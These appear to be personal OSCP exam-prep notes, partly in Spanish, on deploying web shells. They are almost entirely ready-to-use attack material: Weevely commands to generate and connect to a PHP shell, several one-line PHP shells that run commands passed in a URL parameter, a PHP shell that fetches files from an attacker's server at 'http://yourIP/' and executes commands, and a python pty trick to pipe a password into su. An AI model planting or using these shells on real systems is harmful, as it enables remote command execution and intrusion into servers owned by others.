1 full webshells

Weevely

genera webshells

weevely generate password /tmp/payload.php

despues lo llamamos con :

weevely http://192.168.1.2/location_of_payload password

kali

/usr/share/webshells/

2 lite webshells

PHP web shells

<?php system($_GET["cmd"]); ?>

<?php echo shell_exec($_GET['cmd']); ?>

<? passthru($_GET["cmd"]); ?>

php with upload

<?php
 if (isset($_REQUEST['fupload'])) {
  file_put_contents($_REQUEST['fupload'], file_get_contents("http://yourIP/" . $_REQUEST['fupload']));
 };
 if (isset($_REQUEST['cmd'])) {
  echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
 }
?>

then the above can be accessed by

curl  http://IP/shell.php?fupload=filename_on_your_webserver

if running whoami we get the error: ‘standard in must be a tty’ we can try:

(sleep 1; echo password) | python -c "import pty; pty.spawn(['/bin/su','-c','whoami']);"

OSCP Notes

exploiting

webshells

1 full webshells

Weevely

kali

2 lite webshells

PHP web shells

php with upload